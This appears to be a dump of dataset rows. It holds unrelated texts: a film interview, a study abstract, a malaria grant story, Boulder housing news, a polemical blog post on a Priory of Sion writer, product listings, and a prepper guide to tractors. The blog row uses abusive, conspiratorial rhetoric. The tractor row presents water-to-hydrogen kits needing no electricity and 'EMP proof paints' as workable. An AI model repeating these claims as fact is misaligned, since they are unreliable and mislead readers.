text stringlengths 12 4.76M | timestamp stringlengths 26 26 | url stringlengths 32 32 |
|---|---|---|
An Interview with Michael Winterbottom, Director of "Welcome to Sarajevo"
An Interview with Michael Winterbottom, Director of "Welcome to Sarajevo"
An Interview with Michael Winterbottom, Director of "Welcome to Sarajevo"
by Stephen Garrett
After making his film debut in 1995 with the killer-lesbian, road-tripromance “Butterfly Kiss“, and following it a year later with “Jude”, anadaptation of Thomas Hardy’s Jude The Obscure, director MichaelWinterbottom next moves to “Welcome to Sarajevo“, a complete departure fromthe filmmaker’s styles and a considerable challenge to audiences whereverit is shown.
Shot on location and intercut with documentary footage, “Sarajevo” brings tovivid life the intensity of war correspondence, and gathers together theconsiderable talents of lead actors like Woody Harrelson, Marisa Tomei, andEmily Lloyd, all of whom play supporting roles to the story of one man,portrayed by Stephen Dillane, who makes it his own personal crusade tosmuggle at least one child out of the devastated city to safety in anothercountry.
Using news journalist Michael Nicholson’s autobiographical novel aboutsaving a Sarajevan child, “Natasha’s Story“, as source material, Winterbottomand screenwriter Frank Cottrell Boyce have created a film thatunflinchingly depicts one of the most horrifying and generally ignored warsof the late Twentieth century.
indieWIRE: Secretary of State Madeleine Albright has seen the film, hasn’t she?
Michael Winterbottom: That’s right, and now there’s a screening forPresident Clinton. And I think that Albright said that anything that makespeople think about Sarajevo is a good thing, especially since the[American] troops are supposed to leave next summer. So they’re beginningCongressional debates soon about whether they should stay beyond the middleof next summer. So I think they kind of felt that anything that remindedpeople about what it had been like might focus people on the fact that itis worthwhile to keeping the 8,000 troops there to maintain the peace.
iW:Did you ever think that you would be a political filmmaker? Had youconsidered yourself to be one before?
Winterbottom: I’m always a bit suspicious about that description becauseI’m not sure, really, what “political” means. I mean, I think these dayswhen the personal is political and the political is personal, it can meananything, really. So [the usage] tends to be to try and give significanceto something and say, “well, it’s a political thing.” The aim of this filmwas really to try and give some sense of what was happening there, to tryand show something of individual’s experience of Sarajevo and then maybefrom that to build up a bigger picture.
iW:But to have screenings for presidents is quite a change.
Winterbottom: Our hope when we made the film was that it might bringSarajevo to the attention of people, because the starting point for makingthe film was a sense of the bizarreness — that here’s a war happening inthe middle of Europe, we’re watching it on television, you can see it everyday, and yet we’re not doing anything about it — we’re not doing anythingto stop it. And suddenly when I went to Sarajevo the first time, that wasvery much the message I got from people we met. It was terrible to gothrough what they had to go through, but it was made even more frustratingthat they knew that people could see it and people were watching it as ithappened. So in a way, it was a bit like a spectator sport.
iW:What was it like working with the people at the Sarajevo-based SAGA Films?
Winterbottom: It was good. We saw them the very first time we went there,and we showed them the script and they read the script, and they were aboutto start filming their own film. But their attitude was: of course ours isa film from the outside, seen through the eyes of journalists coming towatch what’s happening. They were making a film from the inside. But theywanted audiences in America and audiences in Europe to see something ofwhat was going on. And so they felt the film reflected enough of theirexperience to be worthwhile working on. They wanted to be as closelyinvolved as possible. So they were really helpful.
iW:Originally Jeremy Irons was attached to the project in the main role ofBritish reporter Henderson. How did Stephen Dillane get involved?
Winterbottom: Once it was financed, that’s when we really started casting.And we met quite a few people. And certainly by the time we had metStephen, we kind of felt that, from multiple points of view — fromMiramax’s point of view, Channel Four’s point of view and my point of view— that he was the right person. He had a kind of presence and a kind ofquestioning, really. When I first met him, he said, “I don’t want to dothis.” And I think he felt nervous because he didn’t want to make a filmset in Sarajevo which was just about a British journalist. And that was myattitude as well. So I kind of felt that he would bring the same kind ofbalance, the same questions to what he was doing. And all the way through,he was very conscious of trying to make sure that the Sarajevan charactershe meets are just as important as his character. And I think that was goodin relation especially to Emira (Emira Nusevic), but also to people likethe little girl in the hospital, or the baker whose son is in the camp —in all those scenes, it’s very easy for the star, for the main actor todrag all the attention. And I think he was really trying to make sure thatthe other actors got their scene as well.
iW:The title originally was just “Sarajevo,” wasn’t it?
Winterbottom: I was sent the book, originally, and a screenplay by someoneelse, and those were called, “Natasha’s Story.” So then when I startedworking on it, I kind of felt that it wasn’t Natasha’s story — itshouldn’t be just the story of the girl. So we changed it to “Sarajevo,” asa sort of working title, really. Because no one was convinced that peoplewould flock to see it with that title. And then, in the film there’s alittle documentary bit where you see, scrawled on the wall, “welcome toSarajevo.” So that became the preferred option. Some people did feel thatwe should just take Sarajevo out of the title altogether, but I felt thatthe idea of the film was so much to be about the things that were happeningin that particular city, so it’s to be about the people from that city andto try and make people think about not only the characters in the film butall of the people that live there. And it would be wrong to suddenly losethat connection altogether and try and pretend that it’s just a film aboutjournalists.
iW:That’s the nice thing — for the first half or so, the film is so manypeople’s different stories; and then it just centers on Emira’s story. Itwas an unexpected turn when I was watching the film.
Winterbottom: Frank [Cottrell Boyce], in writing the screenplay, it wasalmost like short stories, like chapters in the film. And the centralthread is Henderson, but you should got off and see other people and thencome back to him. And generally we wanted to have a jagged rhythm and asmany surprises as possible. Because in living in Sarajevo, one of the worstthings would be never knowing what was going to happen next — never beingsure where the sniper was and where the mortar was coming from. And so thatsense of not knowing where the bullet’s coming from, in a way. We tried toput that into the storytelling as well.
Part of working on the screenplay was to watch as much as we could, so wewatched hundreds of hours of news archives, documentary footage — anythingwe could from Sarajevo. So we’d sort of seen all that and we hadincorporated specific scenes into the screenplay because of what we’d seen.So, for instance, the mortar that lands in the bread queue: we’d seen thatmaterial, that was an incredibly powerful sequence. It was one shot and itwas really the news cameraman running from one person to another person andback to another person, almost in a circle — and you could see thecameraman was incredibly panicked and didn’t know what to do. And then thesniper started firing and the cameraman was then running for his life. Andso, having seen that, I just felt that this has got to be in the filmsomehow. So we then got our [fictional] journalists to go and witness that,so we could include that in the story. And so then we had to recreate it aswell. So it was really working from the archive footage. And the generalprincipal was that if we can use the real footage, then let’s use the realfootage. And to try and recreate as little as possible.
iW:Were there a lot of stories which didn’t make the final cut?
Winterbottom: Certainly there were lots of stories that we wanted to havein the film which didn’t get in: stories that we’d seen on the news andsome stories that we did film — and then it was just too much, and therewere just too many stories. I wanted to make sure the film had this sort ofenergy and pace and compression that I felt the screenplay had. And Ididn’t want it to be huge and sprawling. The first cut was 3 hours ofincidents, so we pulled it down to something where you could cope with itand still get the sense that there were thousands of other people whoshould have been in the film.
[Stephen Garrett, a frequent contributor to indieWIRE, is a writer andeditor based in Los Angeles.]
Podcasts
Zhao said with her Bass Reeves biopic, she’ll direct a more traditional cast like she did with her first-timers: “You can work with an actor in a certain way, you can create an environment like Terrence Malick has always done.” | 2024-05-04T01:27:15.642919 | https://example.com/article/8455 |
Personal Commitment Statements: Encouraging the Clinical Application of Continuing Professional Development Events for Health Practitioners in Low- and Middle-Income Countries.
Statements of commitment to change are commonly used to evaluate continuing medical education. However, this approach is new to evaluating the continuing professional development (CPD) of other health care practitioners such as audiology, speech-language therapy, occupational therapy, and physiotherapy in low- and middle-income countries. This study explored the use of Personal Commitment (to change) Statements (PCSs) as an evaluation tool of continuing education for health professionals in low- and middle-income countries, and its impact on the integration of new knowledge and skills with previous knowledge and clinical practice. PCSs were used in a case study conducted at a 1-day interprofessional CPD event held for health practitioners in South Africa. A qualitative thematic analysis was made of these PCSs, and results were synthesized into main themes. Thirty-two participants turned in a PCS at the end of the CPD event with a total of 71 text statements. Three main domains were identified: (1) applying new knowledge in practice (61.97%); (2) increasing training-related content knowledge (21.12%); and (3) sharing information, skill, and resources (16.9%). This study demonstrated that personal commitment statements can be used to describe the outcomes of CPD events for audiologists, speech-language, occupational, and physiotherapists. Participants engaged in reflection generated by the personal commitment statement, which contained no guiding statements, yet elicited responses showing that participants were more aware of the assessment tools and how they could use them in practice. Further study is warranted into the process and the role of follow-up regarding health practitioners' commitment to change in clinical practice. | 2023-09-25T01:27:15.642919 | https://example.com/article/5531 |
NIH $4.75 Million Grant Received for New Approach to Drug-Resistant Malaria
“Most experts around the globe agree that due to rampant antimalarial drug resistance we cannot use individual antimalarial drugs alone, we must use combinations of two or more,” says Paul Roepe, co-founder of Georgetown’s Center for Infectious Disease.
March 6, 2014– A Georgetown College chemistry professor is principal investigator for a new $4.75 million, five-year National Institutes of Health (NIH) grant to identify combinations of two or more drugs that will work effectively against current strains of drug-resistant malaria.
A mosquito-borne disease caused by a parasite, malaria killed more than 650,000 people in 2010 – most of them children in Africa, according to the World Health Organization. And while several antimalarial drugs have successfully treated the disease, in some regions they no longer work due to drug resistance.
“There is an immediate and dire need to rapidly identify and prioritize antimalarial drug combinations for clinical use,” says Paul Roepe, also a professor of biochemistry and cellular and molecular biology and co-founder of Georgetown’s Center for Infectious Disease at Georgetown University Medical Center (GUMC). “Combination therapy has the best chance of reducing the frequency at which new drug resistance phenomena emerge, and our preliminary data suggest that dozens of previously unrecognized drug combinations with high degrees of synergy can be rapidly identified by our new approach.”
A Five-Laboratory Effort
Roepe is heading the effort that will be carried out by his research team at Georgetown with two labs at Johns Hopkins University and another two at NIH.
One of the labs – at NIH’s National Center for Advancing Translational Services (NCATS) – already has developed robots for testing drug combinations.
Roepe says Craig Thomas at NCATS, now also an adjunct at GUMC, is leading that part of the overall project, and the two will co-mentor graduate students working on the project.
“Craig and his colleagues have developed a robotics platform for rapidly screening high numbers of drug combinations,” Roepe explains. “My lab will attempt to figure out which of the drug combinations from the initial screens really are the best by using a number of other measures.”
Previous Research
Roepe has a long history of working on drug-resistant malaria at Georgetown.
That study, authored with colleagues at the University of Notre Dame and the University of Kentucky, found genetic and cell biological evidence linking autophagy to drug resistance in the parasite, which kills the effects of some drugs. Autophagy is the process by which cells remove damaged parts of themselves to restore normal function.
Drug Synergy
The goal of the new NIH-funded study is “to find not just another active antimalarial drug, but synergistic antimalarial drug combinations,” Roepe says. “We are looking for two or more drugs that together have a more than additive effect relative to the drugs alone.”
Drug synergy, Roepe adds, is not a new concept, but has never before been systematically studied for malaria. This is mostly because it is far more difficult to rapidly measure drug sensitivities for malarial parasites, compared to bacteria or tumor cells. Now that his lab has conquered that problem, he says it is ready for a project of the new study’s magnitude.
“Most experts around the globe agree that due to rampant antimalarial drug resistance we cannot use individual antimalarial drugs alone, we must use combinations of two or more,” Roepe says. “Using combination therapy lowers the chance for the emergence of additional drug resistance phenomena, and is likely to slow the spread of existing drug resistant strains. I am hopeful that this large-scale project will cast a very wide net toward identifying dozens of potential antimalarial drug combinations with which we can better control malaria on a global scale.” | 2024-04-15T01:27:15.642919 | https://example.com/article/4995 |
Boulder leaders haven't found "early wins" yet in the city's evolving housing strategy, but perhaps one lies in legalizing currently illegal co-cops that haven't drawn neighbor complaints or making it easier to convert rooms or garages into in-law apartments and cottages.
Those are some of the ideas the Boulder City Council hopes to explore as the city moves forward with its new Comprehensive Housing Strategy.
At the same time, critics of the housing plan, who see it as a boon to developers, worry city officials won't listen to neighborhood concerns.
Late Tuesday, the council unanimously adopted the Comprehensive Housing Strategy's goals, even though many council members felt they were too vague or hinted at imposing solutions on neighborhoods that don't want or need them.
The council voted on the strategy after tabling an ordinance that would have allowed up to six people 62 or older to live together in a single home.
That measure faced stiff neighborhood opposition, and was the subject of a lengthy public hearing in which advocates for affordable housing argued with those who feel Boulder risks losing its special character to a wall of mid-rise apartment buildings.
Several council members wanted to change the language about creating diverse housing options in "every neighborhood."
"It's OK for neighborhoods to be different," Councilman Andrew Shoemaker said. "Not every neighborhood is broken. Some neighborhoods work just fine. And people spend a lot of money to live in these neighborhoods. A lot of people's life savings are wrapped up up in their houses."
But Boulder Mayor Matt Appelbaum said removing language about "every neighborhood" lets too many people off the hook for what should be community solutions.
Councilwoman Lisa Morzel said she had been asking for changes to the city's "accessory dwelling units" rules since the late 1990s, yet nothing has happened.
Some Boulder residents who objected to the senior occupancy limits change said they had tried to get permits for in-law apartments for their own aging parents or grown children and had been unable to.
Councilwoman Suzanne Jones said it shouldn't be that hard to find fixes to the co-op ordinance, which is currently so restrictive that not a single co-op in the city is authorized under it. Boulder's existing legal rental co-ops are technically boarding houses or apartment buildings.
"I think we should do co-op housing," she said, suggesting it as a possible "early win." "I don't think it should be that hard."
'Sounds like a bit of a charade'
David Driskell, Boulder's director of community planning and sustainability, said dryly that he could email the proposals to all the people who wrote to council to oppose the senior occupancy limit change and use them as a sounding board for how controversial those ideas would be.
Instead, those ideas will be run through a series of working groups that city planners hope to convene in October.
The composition of those working groups was a subject of much debate Tuesday night, with those opposed to more development saying there needs to be strong neighborhood representation, and advocates for more affordable housing saying homeowners aren't the only people with a vested interest in Boulder. They said renters, students, low-income workers and commuters need a voice.
On Wednesday, Ray Bridge, a board member of PLAN-Boulder County, said he is concerned the working groups will create the appearance of public input while reaching pre-ordained outcomes.
"It sounds like a bit of a charade, but we'll have to see how it works out," Bridge said. "It didn't sound like it was a structure that promised those groups actually being able to provide much input from any group. It sounds like window dressing."
Zane Selvans, a board member of the Boulder Housing Coalition, which operates three rental co-ops in Boulder, said Tuesday's meeting left him feeling uncertain about the political will to make significant changes.
"I'm glad they left the (accessory dwelling units) and co-op housing nominally in the work plan," he said. "Given how much resistance there was to seniors being able to live with each other, I find it difficult to believe that an (in-law apartment) or co-op will be less controversial. The lack of any kind of pushback (from council) was quite disheartening and makes me very discouraged.
"I don't think more neighborhood input is likely to result in less controversy when there was this reaction to these very modest changes."
'Some of these issues are challenging'
Another study session on the Comprehensive Housing Strategy will be held in December. Driskell said that if the working group process identifies changes that could be made easily to the co-op or accessory dwelling ordinances, those can be pulled out then.
Otherwise, ordinance changes will be considered as a package of larger changes after adoption of the Comprehensive Housing Strategy in early 2015.
Council members were supportive of another tool, allowing entities developing affordable housing units to keep the number of units in an existing building, even if the scope of the rehabilitation project would normally require the building to come up to current code and possibly lose units in the process.
Councilman Sam Weaver said he'd like planners to look at changing how open space requirements are calculated, so that they are per square foot or per person expected to live in a unit, rather than per unit.
Shoemaker also said the city needs to look for legal ways to prevent single-family homes from falling into investor hands to preserve that housing for families rather than as student rentals.
Council members were unanimous in supporting moving forward with a proposed affordable housing project on a city-owned site at 4245 Palo Parkway.
More than 140 neighbors signed a petition opposing the project, and council members said they want Boulder Housing Partners to work closely with them to address parking and other concerns.
However, they said the project — which calls for 35 rental units and 9 owned units, all permanently affordable and aimed at people who work in Boulder, on 3.2 acres — meets many city goals.
John Tayer, president and CEO of the Boulder Chamber, who told the council on Tuesday that developing workforce housing meets multiple community goals, said he was "encouraged" that the housing strategy is moving forward and progress is more important than early wins.
"With respect to quick wins, some of these issues are challenging and they're responding to concerns that they are hearing," he said of the council. "For us and our goals, we were encouraged to see that they understand the needs and want to move this strategy forward to start working on solutions."
Boulder is pretty good at producing rock bands, and by "rock," we mean the in-your-face, guitar-heavy, leather-clad variety — you know, the good kind. For a prime example, look no farther than BANDITS. Full Story | 2023-11-13T01:27:15.642919 | https://example.com/article/6464 |
Sunday, July 15, 2007
Caveat: Funhouse Fortean Conspiracist Dr. Steven Misrach
Forteans are Noams on a spiritual quest, and their canon is hot air with footnotes. On the recommendation of a reader who wanted to know what I thought, I took a look at Dr. Steven Misrach's writing (only had glancing knowledge of it for the past ten years), and pretty much agree with the evaluation below. Never met a Fortean who wasn't an errant fantasist, without exception. Dr. Misrach is one more of these Fortean leftling loons polluting the research community with capricious essays written in a "smart" style. Look, these are dire times, people are dying - yet many "researchers" out there are lost in the funhouse. We can't afford any longer to indulge our childhood dreams. Fascism is breathing down our necks.The victims know this, but the "educated"/wilfully-ignorant who think themselves unaffected are Good Germans, despite all the liberal trappings, and the lunacy is dissociative armor, an earmark of Noamism. Fascism eats ALL of its children, even those who re-invent the world to suit their emotional needs. "Cyberanthropology" is Dr. Misrach's life work - how the word trips off the tongue ...
How pretentious.
- AC
http://priory-of-sion.com/posd/posmis.html
Dr Steven Mizrach, Professor of Anthropology at a Florida University, a Fortean, a believer in Flying Saucers and a Jewish American, has several online articles about the Priory of Sion. His stance concerning it can only be described as being severely gullible. The various silly claims linking the Priory of Sion with world politics he is prepared to take quite seriously ("If it really exists, it may be one of the most powerful secret societies of all time."). Steven Mizrach never mentions the anti-semitic nature of Pierre Plantard. Mizrach's pattern of behaviour on the ‘Priory of Sion Mailing List’ was to take a peek at what was written in The Holy Blood and the Holy Grail and in The Messianic Legacy before committing himself to any conclusive comments in his messages about the Priory of Sion. He seems to accept that the Alpha Galates were founded by Georges Monti (only on Richardson's say-so) and that Monti was Péladan's Secretary (which needs verifying).
The ‘Constitution de la Rose-Croix: le Temple et le Graal’ [10] reveals that Joséphin Péladan was a Conservative Catholic who believed in the True Presence in the Eucharist and who revered Joseph of Arimathea, Hugues de Payens and Dante. Péladan certainly aimed at transforming society by integrating the mystical into it through works of Art, Plays and Music (Robert Richardson was correct about this point). The activities of Joséphin ‘Sar’ Péladan complement the Tradition of the Grand Occident nicely.
Steven Mizrach also has a high regard for Maurice Barrès, without ever mentioning his Nationalism and anti-semitism:
The Nancy Program
http://www.cooper.edu/humanities/core/hss3/m_barres.html
An article in the Historical Dictionary of the Third French Republic 1870-1940 [11] places the name of Maurice Barrès alongside Charles Maurras (Action Française) and Edouard Drumont (owner of the anti-semitic newspaper, La Libre Parole and author of the best-selling book, La France juive).
Steven Mizrach makes the most basic mistakes about the Priory of Sion, claiming that it registered its existence in 1956 in ‘Annemasse’ – when in actual fact this was done at St Julien-en-Genevois:
http://priory-of-sion.com/psp/posd/regdoc.html
Here lies the historical evidence that the Priory of Sion was founded in 1956 and named after the nearby hill to Saint Julien-en-Genevois called Mont Sion – and had nothing whatever to do with the ‘Sion’ in Jerusalem – the alleged ‘history’ of the Priory of Sion dating from the period of the Crusades and Godfrey de Bouillon as mentioned in the Priory Documents is a historical fiction concocted by Pierre Plantard during the 1960s – and here again, Steven Mizrach refuses to comment upon the virulent anti-semitism of Godfrey de Bouillon (and this ‘history’ was revoked, rejected and replaced by another ‘Priory of Sion history’ concocted by Pierre Plantard during the late 1980s/early 1990s).
Steven Mizrach claims that the Priory of Sion is ultimately linked to the 19th century Parisian artistic circles the Symbolists and the Surrealists [12] – without providing the slightest bit of historical evidence to support that theory: so where does it originate from? We know that Philippe de Chérisey was interested in surrealism, and his surrealist ideas found expression in the Priory Documents that were composed by him – but this cannot be used as ‘evidence’ that the Priory of Sion has its origins in the Surrealist Art Movements of 19th century France! And Philippe de Chérisey was not even connected with Plantard's activities before the early 1960s. So this particular theory by Steven Mizrach is very easy to debunk.
Pierre Plantard's main thrust lay in the field of genealogies, not in surrealism, and in his claim to be descended from Dagobert II [13]. Plantard was a Merovingian Pretender and Philippe de Chérisey assisted Plantard with his deceptions – and because Philippe de Chérisey was a lover of surrealism he decorated his support for Plantard in surrealist form. That's all it amounts to. The "parchments" we know were concocted by Philippe de Chérisey at the request of Pierre Plantard [14] – and Philippe de Chérisey was entitled to a share of the profits from the sales of Gérard de Sède's 1967 book L'Or de Rennes for providing the "parchments". The book contract contains the name of Philippe de Chérisey [15].
Steven Mizrach still seems to cling to the List of Grand Masters of the Priory of Sion as given in the Dossiers Secrets d'Henri Lobineau (1967) and that the Priory had links with the Knights Templar – despite the fact that Plantard had scrapped both these claims during the late 1980s and had replaced them with a new set of beliefs: a new List of Grand Masters of the Priory of Sion was produced with it being linked with the ‘Children of St Vincent’ instead of with the Knights Templar. [16] Pierre Plantard had also denounced Philippe Toscan, the author of the Dossiers Secrets as someone who had concocted everything under the influence of LSD. [17] Steven Mizrach does not seem to be interested in any of this. | 2024-06-24T01:27:15.642919 | https://example.com/article/2436 |
Most popular
Official Sony Leather Flip Case - Pink (PSP GO) on other UK sites
The PSP Go flip carry case is made from 100% high quality leather and keeps the console stored and securely in place with the flip closure. The case features a cut out on the back meaning that the PSP Go console logo is visible even when inside the case. With its slim design the console will stay protected without adding any extra bulk so it is as easy as ever to have your PSP Go with you whenever
The PSP Go flip carry case is made from 100% high quality leather and keeps the console stored and securely in place with the flip closure. The case features a cut out on the back meaning that the PSP Go console logo is visible even when inside the case. With its slim design the console will stay protected without adding any extra bulk so it is as easy as ever to have your PSP Go with you whenever
The PSP Go flip carry case is made from 100% high quality leather and keeps the console stored and securely in place with the flip closure. The case features a cut out on the back meaning that the PSP Go console logo is visible even when inside the case. With its slim design the console will stay protected without adding any extra bulk so it is as easy as ever to have your PSP Go with you whenever
The PSP Go flip carry case is made from 100% high quality leather and keeps the console stored and securely in place with the flip closure. The case features a cut out on the back meaning that the PSP Go console logo is ...
The Stanley range is the perfect combination of sharp lines and soft upholstery. The range has a mid-Century modern design, which recalls the clean-lined aesthetic of the 1950s and 60s. Combining the light oak finish with the dark fabrics creates a bold, graphic statement, where the light fabric is contemporary and bright. Designed by Matthew Hilton, both the sofa and armchair have a solid oak
Top features: - Enjoy music anywhere with wireless multi-room playback and a compact portable design - High-Resolution audio playback to hear music as the artist intended - Access online streaming services from Spotify Connect and Google Cast Enjoy music anywhere The h.ear go SRSHG1P ensures that no matter where you are, you can enjoy and share your favourite music. With its compact, wire-free
Top features: - Enjoy music anywhere with wireless multi-room playback and a compact portable design - High-Resolution audio playback to hear music as the artist intended - Access online streaming services from Spotify Connect and Google Cast Enjoy music anywhere The h.ear go SRSHG1P ensures that no matter where you are, you can enjoy and share your favourite music. With its compact, wire-free
body { font-family: Verdana Geneva sans-serif; font-size:11px } td { font-family: Verdana Geneva sans-serif; font-size:11px } Fiio X3 Leather Flip Case A simple yet elegant leather case designed specifically for the FiiO X3 Hi Resolution Audio Player. The case features a clear screen and depressions corresponding to the keys so that the player can be easily operated without having to open the
Includes over 100 knots that are proven to be reliable, safe and effective when tied and used correctly Features easy-to-follow step-by-step instructions for tying each knot Presented in a logical and easily accessible format, with
Official Sony Leather Flip Case - Pink (PSP GO) on other UK sites
Official Sony Leather Flip Case - Pink (PSP GO) on USA sites
The PSP Go flip carry case is made from 100% high quality leather and keeps the console stored and securely in place with the flip closure. The case features a cut out on the back meaning that the PSP Go console logo is visible even when inside the case. With its slim design the console will stay protected without adding any extra bulk so it is as easy as ever to have your PSP Go with you whenever
Alien worlds heart-racing battles white-knuckle racing — you love everything about your favorite games so why not fully immerse yourself in the action? With this headset youll be able to become enveloped in rich robust audio the way your games developers intended it to be heard. Plus a sturdy design and soft ear cushions ensure lasting comfort while you slay enemies deliver
The Pet Gear, Inc. 5-n-1 I-GO2 Plus Traveler has telescoping handle with wheels, to function as a rolling case. Can be used as a backpack, tote, carrier, or car seat. Comes with removable plush pad for easy washing, tether to secure animal, and wheel cover. If the pet fits the dimensions of this product comfortably when the product is fully assembled, the product will support the weight of the
Dogs are very playful and intelligent animals. Channel their energy and curiosity into something positive with the Trixie Dog Strategy Game Flip Board . Ideal for the intermediate canine gamer the game rewards your pet for correctly opening the various compartments. To begin place your dogs favorite treats in any or all of the compartments. By correctly sliding the covers or lifting the flaps
\The rugged Pet Stroller SUV handles curbs, steps and most terrain with ease. The SUV is perfect for strolling down a country lane, around town on a city sidewalk, up a marked hiking trail, or a breezy jaunt along the shoreline.\ | 2024-01-21T01:27:15.642919 | https://example.com/article/1665 |
INFOGRAPHICS: Turkey’s coup attempt in numbers
ISTANBUL
The investigation into who participated in the July 15 failed coup attempt and which vehicles were used is ongoing.The numbers according to the Turkish General Staff and discharge decisions as of July 29 were as follows: | 2024-07-07T01:27:15.642919 | https://example.com/article/5299 |
Correction to: *Scientific Reports* 10.1038/srep46017, published online 07 April 2017
This Article contains an error in Figure 5, where the T7-FoxM1 panels have been erroneously written as 100 and not 25. The correct Figure 5 appears below as Figure [1](#Fig1){ref-type="fig"}.Figure 1A Plk1-site phospho-mimetic mutant of FoxM1b fails to bind Rb *in vitro*. T7-His tagged C-terminal FoxM1 (residues 508--748), Plk1-site phospho-mimetic DD mutant, and GST-Rb (residues 379--928) were all expressed separately in *E. coli*. The bacterial lysates of the wild type or DD mutant FoxM1 were mixed with the lysates containing either GST-Rb or GST-CBP-KIX and then were allowed to bind Ni-agarose column. The eluted proteins, after extensive washing of the column, were assayed for the presence of Rb and CBP by western blotting (**A** and **B**). The left lane in each of the panels indicates the absence of Rb or CBP-KIX in the column elute when GST-Rb or CBP-KIX were passed through the Ni column in absence of FoxM1.
| 2024-07-31T01:27:15.642919 | https://example.com/article/3988 |
Homesteaders and farmers recognize the importance of tractors in daily life. These vehicles tend to be very durable, but it’s important to make sure you can still use them in a post-crisis world.
Aside from increasing the number of things you can use the tractor for, taking these steps will also help your tractor last longer and perform better during its lifespan.
Know What the Tractor Can Do
Over the years, I’ve purchased all kinds of gadgets in my quest to find devices that use less electricity or power while delivering at or near the same level of usefulness as more conventional devices.
For example, when I was still learning how to use power tools, I thought battery powered tools would be better or safer than conventional ones. It wasn’t long before I found out that “under powered” means nothing more than slow and virtually useless.
To this day, my very first battery powered jigsaw sits in its original box somewhere in the attic, with a battery that I haven’t charged more than once every few years to see if it still works. At the same time, my conventional powered jigsaw sits right next to my desk and is always ready to use.
When it comes to preparing a tractor, it is very important to know just how much work they can do. Simply put, you cannot get an engine rated for 5 – 10 horsepower and expect it to do the work of a 25 horsepower engine.
If you are going to add accessories to the tractor, or in any other way expand what you use the tractor for, it is very important to know if the engine, drive train, and transmission can truly take the added wear and tear. The last thing you will want to do is purchase attachments or make plans only to find out that the tractor won’t suit your needs. Get a good sense of what your current tractor can do so that you can purchase something better or look for alternatives before it is too late.
Take control of your home’s energy with this step-by-step System to Energy Independence!
Buy Adapters that Expand their Usability
Did you know that you can purchase an adapter for a tractor that can be used to plow snow?
While many preppers think of tractors as farm and homestead equipment, they may also be useful to conventional homeowners and apartment dwellers. The sheer number of attachments and accessories for tractors make them as versatile as they are powerful.
Here are just a few attachments that you may find of use for homesteading as well as some others that can be used by just about any person that is concerned about having a versatile travel vehicle in time of need:
Forklift Attachment
It’s ideal for people that have large stockpiles stored in boxes or crates. The fork lift can be used to lift all kinds of heavy items at one time. Depending on size and power of the main tractor, a forklift may also be useful for lifting and pushing small vehicles out of the roadway.
Steel Tracks
No matter how big or sturdy tractor tires may be, muddy terrain or complex areas can be more easily navigated with steel tracks that give you advantages similar to what you would have with a tank.
Log Dragger
If you are planning to cut down large trees, you can easily haul the lumber with this tractor attachment.
Spade and Bucket Attachments
These devices will give you a chance to use the tractor as you would a backhoe.
Steel Enclosure
This should be one of the first things you buy, especially if you plan to use the tractor like a forklift or backhoe. The steel cage will keep you safe and may also make it easier to use the tractor in a wider range of weather situations.
Harrows, Scrapers, and Pipe Layers
There are all kinds of attachments for tractors that can be used for planting crops, or digging into the ground for some other purpose.
Get All Shop Manuals for the Tractor and Accessories
As with any other motor vehicle, you need as much information as possible about the parts and functionality of every system in your tractor. A shop manual will give you far more information than just how to exchange old parts for new ones. You may get a better look at what is inside each part so that you can refurbish the parts if needed.
These schematics will also help you gain a sense of additional skills and tools that might be of use to have on hand. For example, if a specific part has a rubber diaphragm, then you know that this part may be something that wears out faster than others. This information will show you what things are best to have in your stockpile. In this case, you will store away materials that can be used to make a new diaphragm as well as extra parts that can be changed out as needed.
When it comes to sourcing replacement materials for parts refurbishing, new polymer and resin technologies may offer better replacement materials. Once you get a look at the shop manual and study it carefully, you will know more about what kind of newer materials may work as well, if not better. Considering you may have to keep the tractor running for decades or even pass it along to future generations, you need as many suitable materials on hand as possible.
A shop manual will also give you a complete listing of every part used in the tractor. Did you know that it may be possible to scavenge parts from vehicles that aren’t the same make and model?
Usually, the key to achieving this goal is to know exactly where the mounting points are and if they can be adapted to your vehicle. Once again, the schematics for the parts used for your tractor will give you some good ideas about how the insides are arranged. This, in turn, makes it easier to estimate what can and cannot be done with scavenged parts.
Setup and Maintain a Maintenance Schedule
It is very easy to be inspired by all the power you wield when you have a tractor at your fingertips. On the other side of the equation, a tractor is still a machine that requires good quality routine maintenance to keep it working for as long as possible.
It’s all too easy to forget when the last oil change was, or when you carried out some other maintenance task. As with your car, setup and maintain a maintenance schedule for your tractor, based on the following:
Consult the shop and owner’s manual so that you know what should be done at each maintenance interval.
Include a listing of all materials and tools that you will need.
Identify any areas where you feel that you do not have the knowledge or skills to do the job yourself. Even if you cannot do the job at the nearest time interval, make it your business to get the necessary training to do the job the next time it is needed.
Set aside enough time so that you can do the job yourself and be sure that you are doing it well.
When it comes to prepping, there are some additional things you should add to your maintenance plans. Consider a situation where you have been doing routine maintenance, but haven’t done any tests to check on the engine compression. Even though the tractor is operating just fine, wear and tear is going to add up over time.
It is best to have some advance warning of parts that may fail so that you can be ready to repair or replace as needed. You will need to consult the shop manual and research each part of the tractor. The more you learn about the risks, the better chance you have of developing tests that will help you diagnose and repair in time.
Convert for Multiple Fuel Use
Just about every prepper is aware about the lack of fuel for motor vehicles in the post crisis world; this topic comes up as often, if not more than EMP proofing. Even though many tractors run on diesel, make sure that you have systems in place that can take advantage of biodiesel, wood burning and methane.
One of the most fascinating emerging technologies involves using hydrogen to partially or fully power motor vehicles. While kits designed to inject hydrogen into cars and trucks are still controversial, there is far more progress being made with tractors. There are already kits on the market that covert water to hydrogen through a hydrolysis process without having to involve a commercial electricity supplier.
Video first seen on Daniel HHO Hydrogen Donatelli.
Consider changing out the tractor’s engine entirely and using a steam engine instead. This is the best way to incorporate the largest number of fuels because you can burn just about anything to generate steam.
If you decide to keep the internal combustion engine running in your tractor, it doesn’t harm to keep a steam engine, boiler system, and transmission connections on hand. If you do run into a situation where the main engine is of no use, then you can try installing the steam engine instead.
When considering alternative fuel types, remember that any system you use must also have a good chance of surviving an EMP. If you experiment with hydrogen fuel, eliminate solid state technologies as much as possible. Instead, look for ways to use gears and other simple machines to replace of electric motors and controls. In a worst case scenario, you can still try shielding these and other vulnerable parts of the tractor with EMP proof paints and coverings.
Have the Right Tools and Spare Parts
More than a few preppers think that if they find an second hand tractor that matches their own, they will have more than enough spare parts to get through a major crisis.
Tractors and their parts are made in largely automated factories just like cars and trucks. This means if there is a problem on the production line that impacts one part, it is likely that it will impact every reproduction of that part until the error is discovered. In most cases, that error is not discovered until hundreds, and perhaps even thousands of consumers wind up having the same kinds of problems.
